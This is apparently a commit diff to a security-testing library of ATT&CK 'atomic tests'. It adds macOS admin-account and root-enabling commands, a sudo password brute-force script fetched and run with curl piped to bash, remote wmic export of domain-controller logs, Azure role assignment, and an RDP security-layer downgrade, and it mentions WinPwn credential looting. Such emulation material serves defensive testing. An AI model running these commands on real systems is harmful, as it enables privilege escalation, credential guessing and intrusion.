+**auto_generated_guid:** 433842ba-e796-4fd5-a14f-95d3a1970875
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+dseditgroup -o edit -a art-user -t user admin
+```
+
+#### Cleanup Commands:
+```bash
+dseditgroup -o edit -d art-user -t user admin
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie
 Loot local Credentials - powerhell kittie technique via function of WinPwn
 
 **Supported Platforms:** Windows
@@ -126,7 +230,7 @@ obfuskittiedump -consoleoutput -noninteractive
 <br/>
 <br/>
 
-## Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz
+## Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz
 Loot local Credentials - Safetykatz technique via function of WinPwn
 
 **Supported Platforms:** Windows

atomics/T1078.003/T1078.003.yaml

@@ -3,7 +3,6 @@ display_name: 'Valid Accounts: Local Accounts'
 atomic_tests:
 - name: Create local account with admin privileges
   auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
-
   description: After execution the new account will be active and added to the Administrators group
   supported_platforms:
   - windows
@@ -22,7 +21,6 @@ atomic_tests:
       net user art-test /delete >nul 2>&1
     name: command_prompt
     elevation_required: true
-
 - name: Create local account with admin privileges - MacOS
   auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
   description: After execution the new account will be active and added to the Administrators group
@@ -42,7 +40,45 @@ atomic_tests:
       sudo dscl . -delete /Users/AtomicUser
     name: bash
     elevation_required: true
-- name: WinPwn - Loot local Credentials - powerhell kittie
+- name: Create local account with admin privileges using sysadminctl utility - MacOS
+  auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+  description: After execution the new account will be active and added to the Administrators group
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
+    cleanup_command: |-
+      sysadminctl interactive -deleteUser art-tester
+    name: bash
+    elevation_required: true
+- name: Enable root account using dsenableroot utility - MacOS
+  auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+  description: After execution the current/new user will have root access
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      dsenableroot #current user
+      dsenableroot -u art-tester -p art-tester -r art-root #new user
+    cleanup_command: |-
+      dsenableroot -d #current user
+      dsenableroot -d -u art-tester -p art-tester #new user
+    name: bash
+    elevation_required: true
+- name: Add a new/existing user to the admin group using dseditgroup utility - macOS
+  auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+  description: After execution the current/new user will be added to the Admin group
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      dseditgroup -o edit -a art-user -t user admin
+    cleanup_command: |-
+      dseditgroup -o edit -d art-user -t user admin
+    name: bash
+    elevation_required: true
+- name: WinPwn - Loot local Credentials - powerhell kittie 
   auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
   description: Loot local Credentials - powerhell kittie technique via function of WinPwn
   supported_platforms:

atomics/T1087.002/T1087.002.md

@@ -680,23 +680,20 @@ This is done remotely via wmic and captures the event code 4776 from the domain
 
 
 
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| Domain | Domain that is being tested against | string | $env:USERDOMAIN|
-| DomainController | Domain Controller that is being tested against | string | $env:UserDnsDomain|
-
 
 #### Attack Commands: Run with `powershell`! 
 
 
 ```powershell
-wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
+$target = $env:LOGONSERVER
+$target = $target.Trim("\\")
+$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
+wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
 ```
 
 #### Cleanup Commands:
 ```powershell
-Remove-Item C:\Temp\ntlmusers.evtx
+Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
 ```
 
 

atomics/T1087.002/T1087.002.yaml

@@ -320,18 +320,12 @@ atomic_tests:
     This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
   supported_platforms:
   - windows
-  input_arguments:
-    Domain:
-      description: Domain that is being tested against
-      type: string
-      default: $env:USERDOMAIN
-    DomainController:
-      description: Domain Controller that is being tested against
-      type: string
-      default: $env:UserDnsDomain
   executor:
     command: |-
-      wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
+      $target = $env:LOGONSERVER
+      $target = $target.Trim("\\")
+      $IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
+      wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
     cleanup_command: |
-      Remove-Item C:\Temp\ntlmusers.evtx
+      Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
     name: powershell

atomics/T1098/T1098.md

@@ -237,7 +237,7 @@ Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In
 |------|-------------|------|---------------|
 | username | Azure AD username | string | jonh@contoso.com|
 | password | Azure AD password | string | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | string | SuperUser|
+| user_principal_name | Display Name, or User Principal Name, of the targeted user principal | string | SuperUser|
 | role_name | Name of the targeted Azure AD role | string | Global Reader|
 
 
@@ -250,7 +250,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzureAD -Credential $Credential
 
-$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
 if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -265,7 +265,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
 if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -400,7 +400,7 @@ Detection hint - check Operation Name "Create role assignment" in subscriptions
 |------|-------------|------|---------------|
 | username | Azure AD username | string | jonh@contoso.com|
 | password | Azure AD password | string | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | string | SuperUser|
+| user_principal_name | Display Name, or User Principal Name, of the targeted user principal | string | SuperUser|
 | role_name | Name of the targeted Azure role | string | Reader|
 | subscription | Name of the targeted subscription | string | Azure subscription 1|
 
@@ -414,7 +414,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzAccount -Credential $Credential
 
-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
 if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -432,7 +432,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
 if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }

atomics/T1098/T1098.yaml

@@ -151,7 +151,7 @@ atomic_tests:
       type: string
       default: p4sswd
     user_principal_name:
-      description: Name of the targeted user (user principal)
+      description: Display Name, or User Principal Name, of the targeted user principal
       type: string
       default: SuperUser
     role_name:
@@ -172,7 +172,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzureAD -Credential $Credential
 
-      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
       if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -184,7 +184,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
       if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -286,7 +286,7 @@ atomic_tests:
       type: string
       default: p4sswd
     user_principal_name:
-      description: Name of the targeted user (user principal)
+      description: Display Name, or User Principal Name, of the targeted user principal
       type: string
       default: SuperUser
     role_name:
@@ -311,7 +311,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzAccount -Credential $Credential
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
       if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -326,7 +326,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
       if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }

atomics/T1110.001/T1110.001.md

@@ -32,11 +32,11 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #3 - Brute Force Credentials of single Azure AD user](#atomic-test-3---brute-force-credentials-of-single-azure-ad-user)
 
-- [Atomic Test #4 - SUDO brute force Debian](#atomic-test-4---sudo-brute-force-debian)
+- [Atomic Test #4 - Password Brute User using Kerbrute Tool](#atomic-test-4---password-brute-user-using-kerbrute-tool)
 
-- [Atomic Test #5 - SUDO brute force Redhat](#atomic-test-5---sudo-brute-force-redhat)
+- [Atomic Test #5 - SUDO Brute Force - Debian](#atomic-test-5---sudo-brute-force---debian)
 
-- [Atomic Test #6 - Password Brute User using Kerbrute Tool](#atomic-test-6---password-brute-user-using-kerbrute-tool)
+- [Atomic Test #6 - SUDO Brute Force - Redhat](#atomic-test-6---sudo-brute-force---redhat)
 
 
 <br/>
@@ -198,122 +198,7 @@ Install-Module -Name AzureAD -Force
 <br/>
 <br/>
 
-## Atomic Test #4 - SUDO brute force Debian
-Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-echo done
-```
-
-#### Cleanup Commands:
-```sh
-rm -f /tmp/asker /tmp/workingfile
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if running on a Debian based machine.
-##### Check Prereq Commands:
-```sh
-if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-```
-##### Get Prereq Commands:
-```sh
-apt-get update && apt-get install -y sudo
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - SUDO brute force Redhat
-Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** b72958a7-53e3-4809-9ee1-58f6ecd99ade
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-su target
-
-PASSWORDS=(one two three password five); \
-    touch /tmp/file; \
-    for P in ${PASSWORDS[@]}; do \
-        date +"%b %d %T"; \
-        sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-        echo "exit: $?"; \
-        if grep -q "root" /tmp/file; then \
-            echo "FOUND: sudo => $P"; break; \
-        else \
-            echo "TRIED: $P"; \
-        fi; \
-        sleep 2; \
-    done; \
-    rm /tmp/file
-```
-
-#### Cleanup Commands:
-```sh
-userdel target
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if running on a Redhat based machine.
-##### Check Prereq Commands:
-```sh
-if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
-if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-```
-##### Get Prereq Commands:
-```sh
-yum -y update && yum install -y openssl sudo
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Password Brute User using Kerbrute Tool
+## Atomic Test #4 - Password Brute User using Kerbrute Tool
 Bruteforce a single user's password from a wordlist
 
 **Supported Platforms:** Windows
@@ -366,4 +251,120 @@ invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - SUDO Brute Force - Debian
+An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_url | url of remote payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+su art
+cd /tmp
+curl -s #{remote_url} |bash
+```
+
+#### Cleanup Commands:
+```bash
+userdel -fr art
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Check if running on a Debian based machine.
+##### Check Prereq Commands:
+```bash
+if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+```
+##### Get Prereq Commands:
+```bash
+apt update && apt install -y openssl sudo curl
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - SUDO Brute Force - Redhat
+An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 4097bc00-5eeb-4d56-aaf9-287d60351d95
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_url | url of remote payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+su art
+cd /tmp
+curl -s #{remote_url} |bash
+```
+
+#### Cleanup Commands:
+```bash
+userdel -fr art
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Check if running on a Redhat based machine.
+##### Check Prereq Commands:
+```bash
+if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
+if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
+if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+```
+##### Get Prereq Commands:
+```bash
+yum update && yum install -y openssl sudo curl
+```
+
+
+
+
 <br/>

atomics/T1110.001/T1110.001.yaml

@@ -117,76 +117,6 @@ atomic_tests:
       }
       Write-Host "End of bruteforce"
 
-- name: SUDO brute force Debian
-  auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-  description: |
-    Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-    PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-    If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-    The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
-  supported_platforms:
-  - linux
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Check if running on a Debian based machine.
-    prereq_command: |
-      if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-      if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-      cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-      cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-      if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-    get_prereq_command: |
-      apt-get update && apt-get install -y sudo
-  executor:
-    elevation_required: false
-    command: |
-      for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-      echo done
-    cleanup_command: |
-      rm -f /tmp/asker /tmp/workingfile
-    name: sh
-
-- name: SUDO brute force Redhat
-  auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
-  description: |
-    Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.  
-  supported_platforms:
-  - linux
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Check if running on a Redhat based machine.
-    prereq_command: |
-      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
-      if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-      if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-      if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-    get_prereq_command: |
-      yum -y update && yum install -y openssl sudo
-  executor:
-    elevation_required: true
-    command: |
-      useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-      su target
-
-      PASSWORDS=(one two three password five); \
-          touch /tmp/file; \
-          for P in ${PASSWORDS[@]}; do \
-              date +"%b %d %T"; \
-              sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-              echo "exit: $?"; \
-              if grep -q "root" /tmp/file; then \
-                  echo "FOUND: sudo => $P"; break; \
-              else \
-                  echo "TRIED: $P"; \
-              fi; \
-              sleep 2; \
-          done; \
-          rm /tmp/file
-    cleanup_command: |
-      userdel target
-    name: sh
 - name: Password Brute User using Kerbrute Tool
   auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
   description: |
@@ -222,3 +152,77 @@ atomic_tests:
     command: |
       cd $env:temp
       .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 
+
+- name: SUDO Brute Force - Debian
+  auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+  description: |
+    An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+    This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Check if running on a Debian based machine.
+    prereq_command: |
+      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+      if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+      if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      apt update && apt install -y openssl sudo curl
+  executor:
+    name: bash
+    elevation_required: true
+    command: |
+      useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+      su art
+      cd /tmp
+      curl -s #{remote_url} |bash
+    cleanup_command: |
+      userdel -fr art
+
+- name: SUDO Brute Force - Redhat
+  auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
+  description: |
+    An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+    This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Check if running on a Redhat based machine.
+    prereq_command: |
+      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
+      if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
+      if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      yum update && yum install -y openssl sudo curl
+  executor:
+    name: bash
+    elevation_required: true
+    command: |
+      useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+      su art
+      cd /tmp
+      curl -s #{remote_url} |bash
+    cleanup_command: |
+      userdel -fr art
+
+

atomics/T1110.001/src/sudo_bruteforce.sh

@@ -0,0 +1,32 @@
+#!/bin/bash
+
+# This script loops through the PASSWORDS array passing each P -> password as
+# --stdin to the "sudo whoami" command, then checks the resulting output for the 
+# username root to discover if the sudo command was passed the correct password 
+# or not. Note: It assumes that the current user is a member of the sudo or 
+# wheel group and can run sudo commands if the correct password is given. 
+
+# Manual testing
+# :~$ P="one"; sudo -k && echo "$P" |sudo -S whoami
+#   [sudo] password for {username}: Sorry, try again.
+#   [sudo] password for {username}: 
+#   sudo: no password was provided
+#   sudo: 1 incorrect password attempt
+# :~$ P="password123"; sudo -k && echo "$P" |sudo -S whoami
+#   [sudo] password for {username}: root
+
+PASSWORDS=(one two three password123 five)
+touch /tmp/temp_file
+for P in ${PASSWORDS[@]}
+do
+    sudo -k && echo "$P" |sudo -S whoami &>/tmp/temp_file
+    if grep --quiet "root" /tmp/temp_file
+    then 
+        echo "$(date +'%Y-%m-%dT%T%Z') exit: $? FOUND: sudo => $P"
+        break
+    else 
+        echo "$(date +'%Y-%m-%dT%T%Z') exit: $? TRIED: $P"
+    fi
+    sleep 2
+done
+rm /tmp/temp_file

atomics/T1112/T1112.md

@@ -106,6 +106,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #48 - Event Viewer Registry Modification - Redirection Program](#atomic-test-48---event-viewer-registry-modification---redirection-program)
 
+- [Atomic Test #49 - Enabling Remote Desktop Protocol via Remote Registry](#atomic-test-49---enabling-remote-desktop-protocol-via-remote-registry)
+
 
 <br/>
 
@@ -1797,4 +1799,36 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v Micr
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #49 - Enabling Remote Desktop Protocol via Remote Registry
+Enabling RDP through remote registry.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e3ad8e83-3089-49ff-817f-e52f8c948090
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 2 /f
+```
+
+
+
+
+
 <br/>

atomics/T1112/T1112.yaml

@@ -765,3 +765,16 @@ atomic_tests:
     cleanup_command: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /f
     name: command_prompt
     elevation_required: true
+- name: Enabling Remote Desktop Protocol via Remote Registry
+  auto_generated_guid: e3ad8e83-3089-49ff-817f-e52f8c948090
+  description: |
+    Enabling RDP through remote registry.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 2 /f
+    name: command_prompt
+    elevation_required: true

atomics/T1140/T1140.md

